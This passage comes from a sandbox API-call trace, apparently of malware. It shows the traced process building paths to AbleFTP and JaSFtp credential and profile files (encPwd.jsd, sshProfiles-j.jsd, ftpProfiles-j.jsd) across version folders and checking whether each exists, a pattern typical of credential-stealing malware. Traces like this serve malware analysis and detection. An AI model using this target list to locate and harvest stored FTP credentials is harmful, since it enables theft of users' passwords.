out: param_1="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\sshProfiles-j.jsd") returned 63 [0146.559] GetProcessHeap () returned 0x690000 [0146.559] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6aa2c8 [0146.559] GetProcessHeap () returned 0x690000 [0146.559] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.570] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.570] GetProcessHeap () returned 0x690000 [0146.571] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.571] GetProcessHeap () returned 0x690000 [0146.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.572] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.573] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0146.573] GetProcessHeap () returned 0x690000 [0146.573] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6aa2c8 [0146.573] GetProcessHeap () returned 0x690000 [0146.573] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.574] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.574] GetProcessHeap () returned 0x690000 [0146.575] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.575] GetProcessHeap () returned 0x690000 [0146.575] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.576] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.577] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\encPwd.jsd") returned 43 [0146.577] GetProcessHeap () returned 0x690000 [0146.577] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5a) returned 0x6a8db8 [0146.577] GetProcessHeap () returned 0x690000 [0146.577] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.578] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\encPwd.jsd") returned 0 [0146.578] GetProcessHeap () returned 0x690000 [0146.579] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.579] GetProcessHeap () returned 0x690000 [0146.579] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.594] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.595] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\sshProfiles-j.jsd") returned 64 [0146.595] GetProcessHeap () returned 0x690000 [0146.595] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x84) returned 0x6aa2c8 [0146.596] GetProcessHeap () returned 0x690000 [0146.596] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.597] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.598] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.598] GetProcessHeap () returned 0x690000 [0146.598] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.598] GetProcessHeap () returned 0x690000 [0146.598] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.599] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.600] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0146.600] GetProcessHeap () returned 0x690000 [0146.600] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x84) returned 0x6aa2c8 [0146.600] GetProcessHeap () returned 0x690000 [0146.601] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.601] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.601] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.602] GetProcessHeap () returned 0x690000 [0146.602] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.602] GetProcessHeap () returned 0x690000 [0146.602] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.603] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.603] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\encPwd.jsd") returned 43 [0146.603] GetProcessHeap () returned 0x690000 [0146.603] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5a) returned 0x6a8db8 [0146.603] GetProcessHeap () returned 0x690000 [0146.604] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.605] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\encPwd.jsd") returned 0 [0146.605] GetProcessHeap () returned 0x690000 [0146.605] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.605] GetProcessHeap () returned 0x690000 [0146.605] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.606] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.607] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\sshProfiles-j.jsd") returned 64 [0146.607] GetProcessHeap () returned 0x690000 [0146.607] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x84) returned 0x6aa2c8 [0146.607] GetProcessHeap () returned 0x690000 [0146.607] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.608] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.608] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.609] GetProcessHeap () returned 0x690000 [0146.609] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.609] GetProcessHeap () returned 0x690000 [0146.609] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.610] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.610] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0146.610] GetProcessHeap () returned 0x690000 [0146.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x84) returned 0x6aa2c8 [0146.611] GetProcessHeap () returned 0x690000 [0146.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.612] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.612] GetProcessHeap () returned 0x690000 [0146.612] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.613] GetProcessHeap () returned 0x690000 [0146.613] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.613] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.615] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\encPwd.jsd") returned 43 [0146.615] GetProcessHeap () returned 0x690000 [0146.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5a) returned 0x6a8db8 [0146.615] GetProcessHeap () returned 0x690000 [0146.615] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.617] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\encPwd.jsd") returned 0 [0146.617] GetProcessHeap () returned 0x690000 [0146.618] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.618] GetProcessHeap () returned 0x690000 [0146.618] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.619] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.620] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\sshProfiles-j.jsd") returned 64 [0146.620] GetProcessHeap () returned 0x690000 [0146.620] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x84) returned 0x6aa2c8 [0146.620] GetProcessHeap () returned 0x690000 [0146.620] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.653] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.653] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.653] GetProcessHeap () returned 0x690000 [0146.654] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.654] GetProcessHeap () returned 0x690000 [0146.654] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.654] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.655] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0146.655] GetProcessHeap () returned 0x690000 [0146.655] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x84) returned 0x6aa2c8 [0146.655] GetProcessHeap () returned 0x690000 [0146.656] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.657] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.657] GetProcessHeap () returned 0x690000 [0146.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.658] GetProcessHeap () returned 0x690000 [0146.658] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.659] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.660] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\encPwd.jsd") returned 43 [0146.660] GetProcessHeap () returned 0x690000 [0146.660] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5a) returned 0x6a8db8 [0146.660] GetProcessHeap () returned 0x690000 [0146.660] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.661] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.662] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\encPwd.jsd") returned 0 [0146.662] GetProcessHeap () returned 0x690000 [0146.662] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.662] GetProcessHeap () returned 0x690000 [0146.662] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.663] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.663] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\sshProfiles-j.jsd") returned 64 [0146.664] GetProcessHeap () returned 0x690000 [0146.664] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x84) returned 0x6aa2c8 [0146.664] GetProcessHeap () returned 0x690000 [0146.664] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.665] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.666] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.667] GetProcessHeap () returned 0x690000 [0146.667] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.667] GetProcessHeap () returned 0x690000 [0146.667] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.668] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.669] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0146.669] GetProcessHeap () returned 0x690000 [0146.669] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x84) returned 0x6aa2c8 [0146.669] GetProcessHeap () returned 0x690000 [0146.669] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.670] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.671] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.671] GetProcessHeap () returned 0x690000 [0146.672] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.672] GetProcessHeap () returned 0x690000 [0146.672] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.672] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.674] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\encPwd.jsd") returned 43 [0146.674] GetProcessHeap () returned 0x690000 [0146.674] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5a) returned 0x6a8db8 [0146.674] GetProcessHeap () returned 0x690000 [0146.675] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.677] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\encPwd.jsd") returned 0 [0146.677] GetProcessHeap () returned 0x690000 [0146.677] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.678] GetProcessHeap () returned 0x690000 [0146.678] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.679] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.680] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\sshProfiles-j.jsd") returned 64 [0146.680] GetProcessHeap () returned 0x690000 [0146.680] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x84) returned 0x6aa2c8 [0146.680] GetProcessHeap () returned 0x690000 [0146.681] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.681] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.681] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.682] GetProcessHeap () returned 0x690000 [0146.682] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.682] GetProcessHeap () returned 0x690000 [0146.682] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.683] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.684] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0146.684] GetProcessHeap () returned 0x690000 [0146.684] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x84) returned 0x6aa2c8 [0146.684] GetProcessHeap () returned 0x690000 [0146.684] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.685] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.686] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.686] GetProcessHeap () returned 0x690000 [0146.686] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.686] GetProcessHeap () returned 0x690000 [0146.686] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.687] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.688] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\encPwd.jsd") returned 41 [0146.689] GetProcessHeap () returned 0x690000 [0146.689] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x56) returned 0x6a8db8 [0146.689] GetProcessHeap () returned 0x690000 [0146.689] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.697] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\encPwd.jsd") returned 0 [0146.698] GetProcessHeap () returned 0x690000 [0146.698] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.698] GetProcessHeap () returned 0x690000 [0146.698] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.699] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.700] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\sshProfiles-j.jsd") returned 62 [0146.700] GetProcessHeap () returned 0x690000 [0146.700] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x80) returned 0x6a8db8 [0146.700] GetProcessHeap () returned 0x690000 [0146.700] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.702] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.702] GetProcessHeap () returned 0x690000 [0146.703] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.703] GetProcessHeap () returned 0x690000 [0146.703] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.703] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.704] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0146.704] GetProcessHeap () returned 0x690000 [0146.704] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x80) returned 0x6a8db8 [0146.704] GetProcessHeap () returned 0x690000 [0146.705] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.707] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.707] GetProcessHeap () returned 0x690000 [0146.707] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.708] GetProcessHeap () returned 0x690000 [0146.708] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.708] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.710] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\encPwd.jsd") returned 41 [0146.710] GetProcessHeap () returned 0x690000 [0146.710] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x56) returned 0x6a8db8 [0146.710] GetProcessHeap () returned 0x690000 [0146.710] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.711] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.712] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\encPwd.jsd") returned 0 [0146.712] GetProcessHeap () returned 0x690000 [0146.712] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.712] GetProcessHeap () returned 0x690000 [0146.712] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.713] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.714] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\sshProfiles-j.jsd") returned 62 [0146.714] GetProcessHeap () returned 0x690000 [0146.714] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x80) returned 0x6a8db8 [0146.714] GetProcessHeap () returned 0x690000 [0146.714] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.715] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.715] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.715] GetProcessHeap () returned 0x690000 [0146.716] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.716] GetProcessHeap () returned 0x690000 [0146.716] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.716] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.717] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0146.717] GetProcessHeap () returned 0x690000 [0146.717] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x80) returned 0x6a8db8 [0146.717] GetProcessHeap () returned 0x690000 [0146.718] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.719] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.719] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.719] GetProcessHeap () returned 0x690000 [0146.719] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.719] GetProcessHeap () returned 0x690000 [0146.719] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.720] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.721] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\encPwd.jsd") returned 41 [0146.721] GetProcessHeap () returned 0x690000 [0146.721] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x56) returned 0x6a8db8 [0146.721] GetProcessHeap () returned 0x690000 [0146.721] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.723] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\encPwd.jsd") returned 0 [0146.723] GetProcessHeap () returned 0x690000 [0146.723] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.723] GetProcessHeap () returned 0x690000 [0146.724] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.724] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.725] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\sshProfiles-j.jsd") returned 62 [0146.725] GetProcessHeap () returned 0x690000 [0146.725] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x80) returned 0x6a8db8 [0146.725] GetProcessHeap () returned 0x690000 [0146.725] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.726] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.726] GetProcessHeap () returned 0x690000 [0146.727] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.727] GetProcessHeap () returned 0x690000 [0146.727] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.727] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.728] wvsprintfW (in: param_1=0x6ab2f8, 